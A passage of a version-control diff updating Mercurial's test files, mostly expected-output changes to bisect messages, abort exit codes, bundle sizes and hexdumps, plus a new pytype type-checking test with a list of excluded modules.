+ Testing changeset 13:b0a32c86eb31 "13" (8 changesets remaining, ~3 tests)
3 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -s # -> update to rev 10
- Testing changeset 10:429fcd26f52d (8 changesets remaining, ~3 tests)
+ Testing changeset 10:429fcd26f52d "merge 6,9" (8 changesets remaining, ~3 tests)
3 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -s # -> update to rev 12
- Testing changeset 12:9f259202bbe7 (8 changesets remaining, ~3 tests)
+ Testing changeset 12:9f259202bbe7 "12" (8 changesets remaining, ~3 tests)
3 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg log -q -r 'bisect(pruned)'
0:33b1f9bc8bc5
@@ -443,10 +443,10 @@
16:609d82a7ebae
17:228c06deef46
$ hg bisect -g # -> update to rev 9
- Testing changeset 9:3c77083deb4a (5 changesets remaining, ~2 tests)
+ Testing changeset 9:3c77083deb4a "9" (5 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -s # -> update to rev 15
- Testing changeset 15:857b178a7cf3 (5 changesets remaining, ~2 tests)
+ Testing changeset 15:857b178a7cf3 "merge 10,13" (5 changesets remaining, ~2 tests)
3 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg log -q -r 'bisect(ignored)'
$ hg bisect -b
@@ -500,13 +500,13 @@
$ hg bisect -r
$ hg bisect -g 17
$ hg bisect -b 8 # -> update to rev 10
- Testing changeset 13:b0a32c86eb31 (8 changesets remaining, ~3 tests)
+ Testing changeset 13:b0a32c86eb31 "13" (8 changesets remaining, ~3 tests)
2 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -b # -> update to rev 13
- Testing changeset 10:429fcd26f52d (5 changesets remaining, ~2 tests)
+ Testing changeset 10:429fcd26f52d "merge 6,9" (5 changesets remaining, ~2 tests)
3 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -b # -> update to rev 15
- Testing changeset 15:857b178a7cf3 (3 changesets remaining, ~1 tests)
+ Testing changeset 15:857b178a7cf3 "merge 10,13" (3 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg log -q -r 'bisect(pruned)'
0:33b1f9bc8bc5
@@ -524,7 +524,7 @@
13:b0a32c86eb31
17:228c06deef46
$ hg bisect -s # -> update to rev 16
- Testing changeset 16:609d82a7ebae (3 changesets remaining, ~1 tests)
+ Testing changeset 16:609d82a7ebae "16" (3 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg log -q -r 'bisect(pruned)'
0:33b1f9bc8bc5
@@ -612,7 +612,7 @@
$ hg bisect -r
$ hg bisect -b 17
$ hg bisect -g 11
- Testing changeset 13:b0a32c86eb31 (5 changesets remaining, ~2 tests)
+ Testing changeset 13:b0a32c86eb31 "13" (5 changesets remaining, ~2 tests)
3 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg log -q -r 'bisect(ignored)'
2:051e12f87bf1
@@ -623,7 +623,7 @@
9:3c77083deb4a
10:429fcd26f52d
$ hg bisect -g
- Testing changeset 15:857b178a7cf3 (3 changesets remaining, ~1 tests)
+ Testing changeset 15:857b178a7cf3 "merge 10,13" (3 changesets remaining, ~1 tests)
3 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -b
The first bad revision is:
@@ -665,7 +665,7 @@
9:3c77083deb4a
10:429fcd26f52d
$ hg bisect --extend
- Extending search to changeset 8:dab8161ac8fc
+ Extending search to changeset 8:dab8161ac8fc "8"
2 files updated, 0 files merged, 2 files removed, 0 files unresolved
$ hg log -q -r 'bisect(untested)'
$ hg log -q -r 'bisect(ignored)'
@@ -677,7 +677,7 @@
9:3c77083deb4a
10:429fcd26f52d
$ hg bisect -g # dab8161ac8fc
- Testing changeset 9:3c77083deb4a (3 changesets remaining, ~1 tests)
+ Testing changeset 9:3c77083deb4a "9" (3 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg log -q -r 'bisect(untested)'
9:3c77083deb4a
@@ -757,13 +757,13 @@
$ hg bisect -r
$ hg bisect -b 13
$ hg bisect -g 8
- Testing changeset 11:82ca6f06eccd (3 changesets remaining, ~1 tests)
+ Testing changeset 11:82ca6f06eccd "11" (3 changesets remaining, ~1 tests)
2 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg log -q -r 'bisect(untested)'
11:82ca6f06eccd
12:9f259202bbe7
$ hg bisect -g 2
- Testing changeset 11:82ca6f06eccd (3 changesets remaining, ~1 tests)
+ Testing changeset 11:82ca6f06eccd "11" (3 changesets remaining, ~1 tests)
0 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg log -q -r 'bisect(untested)'
11:82ca6f06eccd
--- a/tests/test-bisect3.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bisect3.t Tue Apr 20 11:01:06 2021 -0400
@@ -72,13 +72,13 @@
$ hg bisect --good 4
$ hg bisect --good 6
$ hg bisect --bad 12
- Testing changeset 9:2197c557e14c (6 changesets remaining, ~2 tests)
+ Testing changeset 9:2197c557e14c "9=8+3" (6 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect --bad 10
- Testing changeset 8:e74a86251f58 (4 changesets remaining, ~2 tests)
+ Testing changeset 8:e74a86251f58 "8" (4 changesets remaining, ~2 tests)
0 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect --skip 7
- Testing changeset 8:e74a86251f58 (4 changesets remaining, ~2 tests)
+ Testing changeset 8:e74a86251f58 "8" (4 changesets remaining, ~2 tests)
0 files updated, 0 files merged, 0 files removed, 0 files unresolved
test template
--- a/tests/test-blackbox.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-blackbox.t Tue Apr 20 11:01:06 2021 -0400
@@ -317,6 +317,17 @@
1970/01/01 00:00:00 bob @45589e459b2edfbf3dbde7e01f611d2c1e7453d7 (5000)> --debug log -r tip exited 0 after *.?? seconds (glob)
1970/01/01 00:00:00 bob @45589e459b2edfbf3dbde7e01f611d2c1e7453d7 (5000)> blackbox
+Skip rotation if the .hg is read-only
+
+#if unix-permissions
+ $ chmod -w .hg
+ $ hg log -r. -T '{rev}\n' --config blackbox.maxsize=1 --debug
+ warning: cannot rename '$TESTTMP/blackboxtest3/.hg/blackbox.log.1' to '$TESTTMP/blackboxtest3/.hg/blackbox.log': Permission denied
+ warning: cannot write to blackbox.log: Permission denied
+ 1
+ $ chmod +w .hg
+#endif
+
Test log recursion from dirty status check
$ cat > ../r.py <<EOF
--- a/tests/test-bookmarks-pushpull.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bookmarks-pushpull.t Tue Apr 20 11:01:06 2021 -0400
@@ -129,10 +129,10 @@
bundle2-output: bundle parameter:
bundle2-output: start of parts
bundle2-output: bundle part: "replycaps"
- bundle2-output-part: "replycaps" 241 bytes payload
+ bundle2-output-part: "replycaps" 224 bytes payload
bundle2-output: part 0: "REPLYCAPS"
bundle2-output: header chunk size: 16
- bundle2-output: payload chunk size: 241
+ bundle2-output: payload chunk size: 224
bundle2-output: closing payload chunk
bundle2-output: bundle part: "check:bookmarks"
bundle2-output-part: "check:bookmarks" 23 bytes payload
@@ -162,9 +162,9 @@
bundle2-input: part parameters: 0
bundle2-input: found a handler for part replycaps
bundle2-input-part: "replycaps" supported
- bundle2-input: payload chunk size: 241
+ bundle2-input: payload chunk size: 224
bundle2-input: payload chunk size: 0
- bundle2-input-part: total payload size 241
+ bundle2-input-part: total payload size 224
bundle2-input: part header size: 22
bundle2-input: part type: "CHECK:BOOKMARKS"
bundle2-input: part id: "1"
@@ -241,10 +241,10 @@
bundle2-output: bundle parameter:
bundle2-output: start of parts
bundle2-output: bundle part: "replycaps"
- bundle2-output-part: "replycaps" 241 bytes payload
+ bundle2-output-part: "replycaps" 224 bytes payload
bundle2-output: part 0: "REPLYCAPS"
bundle2-output: header chunk size: 16
- bundle2-output: payload chunk size: 241
+ bundle2-output: payload chunk size: 224
bundle2-output: closing payload chunk
bundle2-output: bundle part: "check:bookmarks"
bundle2-output-part: "check:bookmarks" 23 bytes payload
@@ -275,9 +275,9 @@
bundle2-input: part parameters: 0
bundle2-input: found a handler for part replycaps
bundle2-input-part: "replycaps" supported
- bundle2-input: payload chunk size: 241
+ bundle2-input: payload chunk size: 224
bundle2-input: payload chunk size: 0
- bundle2-input-part: total payload size 241
+ bundle2-input-part: total payload size 224
bundle2-input: part header size: 22
bundle2-input: part type: "CHECK:BOOKMARKS"
bundle2-input: part id: "1"
@@ -1177,7 +1177,7 @@
searching for changes
no changes found
abort: prepushkey hook exited with status 1
- [255]
+ [40]
#endif
@@ -1217,7 +1217,7 @@
no changes found
remote: prepushkey hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
#endif
@@ -1257,7 +1257,7 @@
no changes found
remote: prepushkey hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
#endif
@@ -1334,7 +1334,7 @@
no changes found
remote: prepushkey.no-bm-move hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
#endif
-- test for pushing bookmarks pointing to secret changesets
--- a/tests/test-bookmarks.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bookmarks.t Tue Apr 20 11:01:06 2021 -0400
@@ -1125,7 +1125,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
$ cp .hg/bookmarks.pending.saved .hg/bookmarks.pending
(check visible bookmarks while transaction running in repo)
@@ -1158,7 +1158,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
Check pretxnclose-bookmark can abort a transaction
--------------------------------------------------
@@ -1242,7 +1242,7 @@
transaction abort!
rollback completed
abort: pretxnclose-bookmark.force-public hook exited with status 1
- [255]
+ [40]
create on a public changeset
@@ -1254,4 +1254,4 @@
transaction abort!
rollback completed
abort: pretxnclose-bookmark.force-forward hook exited with status 1
- [255]
+ [40]
--- a/tests/test-bundle-r.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bundle-r.t Tue Apr 20 11:01:06 2021 -0400
@@ -171,14 +171,15 @@
should fail
$ hg -R test bundle --base 2 -r tip test-bundle-branch1.hg test-3
- abort: --base is incompatible with specifying a destination
+ abort: --base is incompatible with specifying destinations
[10]
$ hg -R test bundle -a -r tip test-bundle-branch1.hg test-3
- abort: --all is incompatible with specifying a destination
+ abort: --all is incompatible with specifying destinations
[10]
$ hg -R test bundle -r tip test-bundle-branch1.hg
- abort: repository default-push not found
- [255]
+ config error: default repository not configured!
+ (see 'hg help config.paths')
+ [30]
$ hg -R test bundle --base 2 -r tip test-bundle-branch1.hg
2 changesets found
@@ -223,7 +224,7 @@
adding changesets
transaction abort!
rollback completed
- abort: 00changelog.i@93ee6ab32777: unknown parent
+ abort: 00changelog.i@93ee6ab32777cd430e07da694794fb6a4f917712: unknown parent
[50]
revision 2
--- a/tests/test-bundle-type.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bundle-type.t Tue Apr 20 11:01:06 2021 -0400
@@ -201,6 +201,15 @@
(see 'hg help bundlespec' for supported values for --type)
[10]
+zstd supports threading
+
+ $ hg init test-compthreads
+ $ cd test-compthreads
+ $ hg debugbuilddag +3
+ $ hg --config experimental.bundlecompthreads=1 bundle -a -t zstd-v2 zstd-v2-threaded.hg
+ 3 changesets found
+ $ cd ..
+
#else
zstd is a valid engine but isn't available
--- a/tests/test-bundle.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bundle.t Tue Apr 20 11:01:06 2021 -0400
@@ -295,18 +295,29 @@
#if reporevlogstore
$ hg -R test debugcreatestreamclonebundle packed.hg
- writing 2664 bytes for 6 files
- bundle requirements: generaldelta, revlogv1, sparserevlog
+ writing 2664 bytes for 6 files (no-zstd !)
+ writing 2665 bytes for 6 files (zstd !)
+ bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !)
+ bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !)
$ f -B 64 --size --sha1 --hexdump packed.hg
- packed.hg: size=2840, sha1=12bf3eee3eb8a04c503ce2d29b48f0135c7edff5
+ packed.hg: size=2840, sha1=12bf3eee3eb8a04c503ce2d29b48f0135c7edff5 (no-zstd !)
+ packed.hg: size=2841, sha1=8b645a65f49b0ae43042a9f3da56d4bfdf1c7f99 (zstd no-rust !)
+ packed.hg: size=2860, sha1=81d7a2e535892cda51e82c200f818de2cca828d3 (rust !)
0000: 48 47 53 31 55 4e 00 00 00 00 00 00 00 06 00 00 |HGS1UN..........|
- 0010: 00 00 00 00 0a 68 00 23 67 65 6e 65 72 61 6c 64 |.....h.#generald|
- 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp|
- 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/|
+ 0010: 00 00 00 00 0a 68 00 23 67 65 6e 65 72 61 6c 64 |.....h.#generald| (no-zstd !)
+ 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| (no-zstd !)
+ 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| (no-zstd !)
+ 0010: 00 00 00 00 0a 69 00 23 67 65 6e 65 72 61 6c 64 |.....i.#generald| (zstd no-rust !)
+ 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| (zstd no-rust !)
+ 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| (zstd no-rust !)
+ 0010: 00 00 00 00 0a 69 00 36 67 65 6e 65 72 61 6c 64 |.....i.6generald| (rust !)
+ 0020: 65 6c 74 61 2c 70 65 72 73 69 73 74 65 6e 74 2d |elta,persistent-| (rust !)
+ 0030: 6e 6f 64 65 6d 61 70 2c 72 65 76 6c 6f 67 76 31 |nodemap,revlogv1| (rust !)
$ hg debugbundle --spec packed.hg
- none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog
+ none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog (no-rust !)
+ none-packed1;requirements%3Dgeneraldelta%2Cpersistent-nodemap%2Crevlogv1%2Csparserevlog (rust !)
generaldelta requirement is not listed in stream clone bundles unless used
@@ -317,17 +328,23 @@
$ cd ..
$ hg -R testnongd debugcreatestreamclonebundle packednongd.hg
writing 301 bytes for 3 files
- bundle requirements: revlogv1
+ bundle requirements: revlogv1 (no-rust !)
+ bundle requirements: persistent-nodemap, revlogv1 (rust !)
$ f -B 64 --size --sha1 --hexdump packednongd.hg
- packednongd.hg: size=383, sha1=1d9c230238edd5d38907100b729ba72b1831fe6f
+ packednongd.hg: size=383, sha1=1d9c230238edd5d38907100b729ba72b1831fe6f (no-rust !)
+ packednongd.hg: size=402, sha1=d3cc1417f0e8142cf9340aaaa520b660ad3ec3ea (rust !)
0000: 48 47 53 31 55 4e 00 00 00 00 00 00 00 03 00 00 |HGS1UN..........|
- 0010: 00 00 00 00 01 2d 00 09 72 65 76 6c 6f 67 76 31 |.....-..revlogv1|
- 0020: 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 34 0a 00 |.data/foo.i.64..|
- 0030: 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+ 0010: 00 00 00 00 01 2d 00 09 72 65 76 6c 6f 67 76 31 |.....-..revlogv1| (no-rust !)
+ 0020: 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 34 0a 00 |.data/foo.i.64..| (no-rust !)
+ 0030: 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| (no-rust !)
+ 0010: 00 00 00 00 01 2d 00 1c 70 65 72 73 69 73 74 65 |.....-..persiste| (rust !)
+ 0020: 6e 74 2d 6e 6f 64 65 6d 61 70 2c 72 65 76 6c 6f |nt-nodemap,revlo| (rust !)
+ 0030: 67 76 31 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 |gv1.data/foo.i.6| (rust !)
$ hg debugbundle --spec packednongd.hg
- none-packed1;requirements%3Drevlogv1
+ none-packed1;requirements%3Drevlogv1 (no-rust !)
+ none-packed1;requirements%3Dpersistent-nodemap%2Crevlogv1 (rust !)
Warning emitted when packed bundles contain secret changesets
@@ -341,7 +358,8 @@
$ hg -R testsecret debugcreatestreamclonebundle packedsecret.hg
(warning: stream clone bundle will contain secret revisions)
writing 301 bytes for 3 files
- bundle requirements: generaldelta, revlogv1, sparserevlog
+ bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !)
+ bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !)
Unpacking packed1 bundles with "hg unbundle" isn't allowed
@@ -733,7 +751,7 @@
partial history bundle, fails w/ unknown parent
$ hg -R bundle.hg verify
- abort: 00changelog.i@bbd179dfa0a7: unknown parent
+ abort: 00changelog.i@bbd179dfa0a71671c253b3ae0aa1513b60d199fa: unknown parent
[50]
full history bundle, refuses to verify non-local repo
--- a/tests/test-bundle2-exchange.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bundle2-exchange.t Tue Apr 20 11:01:06 2021 -0400
@@ -548,7 +548,7 @@
remote: Abandon ship!
remote: (don't panic)
abort: push failed on remote
- [255]
+ [100]
$ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6
pushing to http://localhost:$HGPORT2/
@@ -556,7 +556,7 @@
remote: Abandon ship!
remote: (don't panic)
abort: push failed on remote
- [255]
+ [100]
Doing the actual push: unknown mandatory parts
@@ -570,19 +570,19 @@
pushing to other
searching for changes
abort: missing support for test:unknown
- [255]
+ [100]
$ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6
pushing to ssh://user@dummy/other
searching for changes
abort: missing support for test:unknown
- [255]
+ [100]
$ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6
pushing to http://localhost:$HGPORT2/
searching for changes
abort: missing support for test:unknown
- [255]
+ [100]
Doing the actual push: race
@@ -638,7 +638,7 @@
remote: Cleaning up the mess...
remote: rollback completed
abort: pretxnclose.failpush hook exited with status 1
- [255]
+ [40]
$ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6
pushing to ssh://user@dummy/other
@@ -653,7 +653,7 @@
remote: rollback completed
remote: pretxnclose.failpush hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
$ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6
pushing to http://localhost:$HGPORT2/
@@ -668,7 +668,7 @@
remote: rollback completed
remote: pretxnclose.failpush hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
(check that no 'pending' files remain)
@@ -699,7 +699,7 @@
remote: Cleaning up the mess...
remote: rollback completed
abort: pretxnchangegroup hook exited with status 1
- [255]
+ [40]
$ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6
pushing to ssh://user@dummy/other
searching for changes
@@ -712,7 +712,7 @@
remote: rollback completed
remote: pretxnchangegroup hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
$ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6
pushing to http://localhost:$HGPORT2/
searching for changes
@@ -725,7 +725,7 @@
remote: rollback completed
remote: pretxnchangegroup hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
Check output capture control.
@@ -747,7 +747,7 @@
Cleaning up the mess...
rollback completed
abort: pretxnchangegroup hook exited with status 1
- [255]
+ [40]
$ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6
pushing to ssh://user@dummy/other
searching for changes
@@ -760,7 +760,7 @@
remote: rollback completed
remote: pretxnchangegroup hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
$ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6
pushing to http://localhost:$HGPORT2/
searching for changes
@@ -773,7 +773,7 @@
remote: rollback completed
remote: pretxnchangegroup hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
Check abort from mandatory pushkey
@@ -950,7 +950,7 @@
searching for changes
remote: Lock should not be taken
abort: push failed on remote
- [255]
+ [100]
$ cat >> ../lazylock/.hg/hgrc <<EOF
> [experimental]
--- a/tests/test-bundle2-remote-changegroup.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bundle2-remote-changegroup.t Tue Apr 20 11:01:06 2021 -0400
@@ -542,7 +542,7 @@
searching for changes
remote: remote-changegroup
abort: missing support for remote-changegroup - digest:foo
- [255]
+ [100]
Missing digest
--- a/tests/test-casecollision-merge.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-casecollision-merge.t Tue Apr 20 11:01:06 2021 -0400
@@ -145,7 +145,7 @@
$ hg merge
abort: case-folding collision between [aA] and [Aa] (re)
- [255]
+ [20]
$ hg parents --template '{rev}\n'
4
$ hg status -A
@@ -158,7 +158,7 @@
1 files updated, 0 files merged, 2 files removed, 0 files unresolved
$ hg merge
abort: case-folding collision between [aA] and [Aa] (re)
- [255]
+ [20]
$ hg parents --template '{rev}\n'
2
$ hg status -A
@@ -213,7 +213,7 @@
$ hg merge 0
abort: case-folding collision between Aa and directory of aA/a
- [255]
+ [20]
(note: no collision between 0 and 00 or 000/f)
Directory case-folding collision:
@@ -328,7 +328,7 @@
A B
$ hg update
abort: case-folding collision between [bB] and [Bb] (re)
- [255]
+ [20]
$ hg update --check
abort: uncommitted changes
--- a/tests/test-casefolding.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-casefolding.t Tue Apr 20 11:01:06 2021 -0400
@@ -115,7 +115,7 @@
$ hg up
A: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ cat a
gold
$ rm a
--- a/tests/test-check-code.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-check-code.t Tue Apr 20 11:01:06 2021 -0400
@@ -11,6 +11,7 @@
> -X contrib/python-zstandard \
> -X hgext/fsmonitor/pywatchman \
> -X mercurial/thirdparty \
+ > -X mercurial/pythoncapi_compat.h \
> | sed 's-\\-/-g' | "$check_code" --warnings --per-file=0 - || false
Skipping contrib/automation/hgautomation/__init__.py it has no-che?k-code (glob)
Skipping contrib/automation/hgautomation/aws.py it has no-che?k-code (glob)
@@ -65,10 +66,10 @@
COPYING
Makefile
README.rst
- black.toml
hg
hgeditor
hgweb.cgi
+ pyproject.toml
rustfmt.toml
setup.py
--- a/tests/test-check-format.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-check-format.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,11 @@
#require black test-repo
+Black needs the real USERPROFILE in order to run on Windows
+#if msys
+ $ USERPROFILE="$REALUSERPROFILE"
+ $ export USERPROFILE
+#endif
+
$ cd $RUNTESTDIR/..
- $ black --config=black.toml --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'`
+ $ black --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'`
--- a/tests/test-check-interfaces.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-check-interfaces.py Tue Apr 20 11:01:06 2021 -0400
@@ -85,6 +85,7 @@
class dummyrepo(object):
def __init__(self):
self.ui = uimod.ui()
+ self._wanted_sidedata = set()
def filtered(self, name):
pass
@@ -113,6 +114,10 @@
def close(self):
pass
+ @property
+ def closed(self):
+ pass
+
def main():
ui = uimod.ui()
@@ -243,7 +248,10 @@
# Conforms to imanifestlog.
ml = manifest.manifestlog(
- vfs, repo, manifest.manifestrevlog(repo.svfs), repo.narrowmatch()
+ vfs,
+ repo,
+ manifest.manifestrevlog(repo.nodeconstants, repo.svfs),
+ repo.narrowmatch(),
)
checkzobject(ml)
checkzobject(repo.manifestlog)
@@ -258,7 +266,7 @@
# Conforms to imanifestdict.
checkzobject(mctx.read())
- mrl = manifest.manifestrevlog(vfs)
+ mrl = manifest.manifestrevlog(repo.nodeconstants, vfs)
checkzobject(mrl)
ziverify.verifyClass(repository.irevisiondelta, revlog.revlogrevisiondelta)
@@ -272,6 +280,7 @@
flags=b'',
baserevisionsize=None,
revision=b'',
+ sidedata=b'',
delta=None,
)
checkzobject(rd)
--- a/tests/test-check-module-imports.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-check-module-imports.t Tue Apr 20 11:01:06 2021 -0400
@@ -14,6 +14,10 @@
Known-bad files are excluded by -X as some of them would produce unstable
outputs, which should be fixed later.
+NOTE: the `hg locate` command here only works on files that are known to
+Mercurial. If you add an import of a new file and haven't yet `hg add`ed it, you
+will likely receive warnings about a direct import.
+
$ testrepohg locate 'set:**.py or grep(r"^#!.*?python")' \
> 'tests/**.t' \
> -X hgweb.cgi \
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-check-pytype.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,104 @@
+#require pytype py3 slow
+
+ $ cd $RUNTESTDIR/..
+
+Many of the individual files that are excluded here confuse pytype
+because they do a mix of Python 2 and Python 3 things
+conditionally. There's no good way to help it out with that as far as
+I can tell, so let's just hide those files from it for now. We should
+endeavor to empty this list out over time, as some of these are
+probably hiding real problems.
+
+mercurial/bundlerepo.py # no vfs and ui attrs on bundlerepo
+mercurial/changegroup.py # mysterious incorrect type detection
+mercurial/chgserver.py # [attribute-error]
+mercurial/cmdutil.py # No attribute 'markcopied' on mercurial.context.filectx [attribute-error]
+mercurial/context.py # many [attribute-error]
+mercurial/copies.py # No attribute 'items' on None [attribute-error]
+mercurial/crecord.py # tons of [attribute-error], [module-attr]
+mercurial/debugcommands.py # [wrong-arg-types]
+mercurial/dispatch.py # initstdio: No attribute ... on TextIO [attribute-error]
+mercurial/exchange.py # [attribute-error]
+mercurial/hgweb/hgweb_mod.py # [attribute-error], [name-error], [wrong-arg-types]
+mercurial/hgweb/server.py # [attribute-error], [name-error], [module-attr]
+mercurial/hgweb/webcommands.py # [missing-parameter]
+mercurial/hgweb/wsgicgi.py # confused values in os.environ
+mercurial/httppeer.py # [attribute-error], [wrong-arg-types]
+mercurial/interfaces # No attribute 'capabilities' on peer [attribute-error]
+mercurial/keepalive.py # [attribute-error]
+mercurial/localrepo.py # [attribute-error]
+mercurial/lsprof.py # unguarded import
+mercurial/manifest.py # [unsupported-operands], [wrong-arg-types]
+mercurial/minirst.py # [unsupported-operands], [attribute-error]
+mercurial/patch.py # [wrong-arg-types]
+mercurial/pure/osutil.py # [invalid-typevar], [not-callable]
+mercurial/pure/parsers.py # [attribute-error]
+mercurial/pycompat.py # bytes vs str issues
+mercurial/repoview.py # [attribute-error]
+mercurial/sslutil.py # [attribute-error]
+mercurial/statprof.py # bytes vs str on TextIO.write() [wrong-arg-types]
+mercurial/testing/storage.py # tons of [attribute-error]
+mercurial/ui.py # [attribute-error], [wrong-arg-types]
+mercurial/unionrepo.py # ui, svfs, unfiltered [attribute-error]
+mercurial/upgrade.py # line 84, in upgraderepo: No attribute 'discard' on Dict[nothing, nothing] [attribute-error]
+mercurial/util.py # [attribute-error], [wrong-arg-count]
+mercurial/utils/procutil.py # [attribute-error], [module-attr], [bad-return-type]
+mercurial/utils/stringutil.py # [module-attr], [wrong-arg-count]
+mercurial/utils/memorytop.py # not 3.6 compatible
+mercurial/win32.py # [not-callable]
+mercurial/wireprotoframing.py # [unsupported-operands], [attribute-error], [import-error]
+mercurial/wireprotoserver.py # line 253, in _availableapis: No attribute '__iter__' on Callable[[Any, Any], Any] [attribute-error]
+mercurial/wireprotov1peer.py # [attribute-error]
+mercurial/wireprotov1server.py # BUG?: BundleValueError handler accesses subclass's attrs
+mercurial/wireprotov2server.py # [unsupported-operands], [attribute-error]
+
+TODO: use --no-cache on test server? Caching the files locally helps during
+development, but may be a hinderance for CI testing.
+
+ $ pytype -V 3.6 --keep-going --jobs auto mercurial \
+ > -x mercurial/bundlerepo.py \
+ > -x mercurial/changegroup.py \
+ > -x mercurial/chgserver.py \
+ > -x mercurial/cmdutil.py \
+ > -x mercurial/context.py \
+ > -x mercurial/copies.py \
+ > -x mercurial/crecord.py \
+ > -x mercurial/debugcommands.py \
+ > -x mercurial/dispatch.py \
+ > -x mercurial/exchange.py \
+ > -x mercurial/hgweb/hgweb_mod.py \
+ > -x mercurial/hgweb/server.py \
+ > -x mercurial/hgweb/webcommands.py \
+ > -x mercurial/hgweb/wsgicgi.py \
+ > -x mercurial/httppeer.py \
+ > -x mercurial/interfaces \
+ > -x mercurial/keepalive.py \
+ > -x mercurial/localrepo.py \
+ > -x mercurial/lsprof.py \
+ > -x mercurial/manifest.py \
+ > -x mercurial/minirst.py \
+ > -x mercurial/patch.py \
+ > -x mercurial/pure/osutil.py \
+ > -x mercurial/pure/parsers.py \
+ > -x mercurial/pycompat.py \
+ > -x mercurial/repoview.py \
+ > -x mercurial/sslutil.py \
+ > -x mercurial/statprof.py \
+ > -x mercurial/testing/storage.py \
+ > -x mercurial/thirdparty \
+ > -x mercurial/ui.py \
+ > -x mercurial/unionrepo.py \
+ > -x mercurial/upgrade.py \
+ > -x mercurial/utils/procutil.py \
+ > -x mercurial/utils/stringutil.py \
+ > -x mercurial/utils/memorytop.py \
+ > -x mercurial/win32.py \
+ > -x mercurial/wireprotoframing.py \
+ > -x mercurial/wireprotoserver.py \
+ > -x mercurial/wireprotov1peer.py \
+ > -x mercurial/wireprotov1server.py \
+ > -x mercurial/wireprotov2server.py \
+ > > $TESTTMP/pytype-output.txt || cat $TESTTMP/pytype-output.txt
+
+Only show the results on a failure, because the output on success is also
+voluminous and variable.
--- a/tests/test-churn.t Thu Mar 25 19:06:28 2021 -0400
